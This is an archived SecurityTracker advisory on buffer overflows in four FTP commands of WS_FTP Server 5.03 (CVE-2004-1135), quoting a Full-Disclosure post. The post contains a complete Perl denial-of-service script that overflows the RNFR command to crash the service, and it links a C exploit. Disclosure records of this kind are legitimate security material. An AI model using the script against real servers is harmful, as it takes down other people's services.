SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP Buffer Overflow in Processing Certain FTP Commands Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012353
SecurityTracker URL:  http://securitytracker.com/id/1012353
CVE Reference:   CVE-2004-1135   (Links to External Site)
Updated:  Dec 8 2004
Original Entry Date:  Nov 29 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.03, 2004.10.14
Description:   Several vulnerabilities were reported in WS_FTP Server. A remote authenticated user can execute arbitrary code on the target system.

Reed Arvin reported that a remote authenticated user can trigger a buffer overflow in several FTP commands. The SITE, XMKD, MKD, and RFNR FTP commands are affected. A remote user can cause the FTP service to crash or execute arbitrary code.

A demonstration exploit is available at:

http://noph0bia.lostspirits.org/Exploits/IPSWSFTP-exploit.c

The vendor was notified without response.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/ws_ftp-server/index.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Dec 20 2004 (Vendor Issues Fix) WS_FTP Buffer Overflow in Processing Certain FTP Commands Lets Remote Users Execute Arbitrary Code
The vendor has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] Multiple buffer overlows in WS_FTP Server Version 5.03, 2004.10.14.


Summary:
Multiple buffer overflows exists in WS_FTP Server Version 5.03,
2004.10.14 (http://www.ipswitch.com/).

Details:
Multiple buffer overflows exist in WS_FTP Server Version 5.03,
2004.10.14. There are four vulnerable commands that can be used to
cause these buffer overflows. Three of the vulnerable commands can be
used to stop the WS_FTP Server service resulting in a denial of
service. The vulnerable commands are SITE, XMKD, MKD, and RNFR.

Vulnerable Versions:
WS_FTP Server Version 5.03, 2004.10.14

Solutions:
The vendor was notified of the issue. There was no response.

Exploit:
http://noph0bia.lostspirits.org/Exploits/IPSWSFTP-exploit.c (Thanks to
NoPh0bia noph0bia[at]lostspirits[dot]org)

#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>
#        WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => "21",
				    Proto    => "TCP"))
{
	print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";

	sleep(1);

	print $socket "USER $ARGV[1]\r\n";

	sleep(1);

	print $socket "PASS $ARGV[2]\r\n";

	sleep(1);

	print $socket "PORT 127,0,0,1,18,12\r\n";

	sleep(1);

	print $socket "RNFR " . "A" x 768 . "\r\n";

	close($socket);

	sleep(1);

	if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
					    PeerPort => "21",
					    Proto    => "TCP"))
	{
		close($socket);

		print "failed!\n";
	}
	else
	{
		print "successful!\n";
	}
}
else
{
	print "Cannot connect to $ARGV[0]:21\n";
}
#===== End WS_FTP_Overflow.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
Exploit assistance from NoPh0bia noph0bia[at]lostspirits[dot]org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC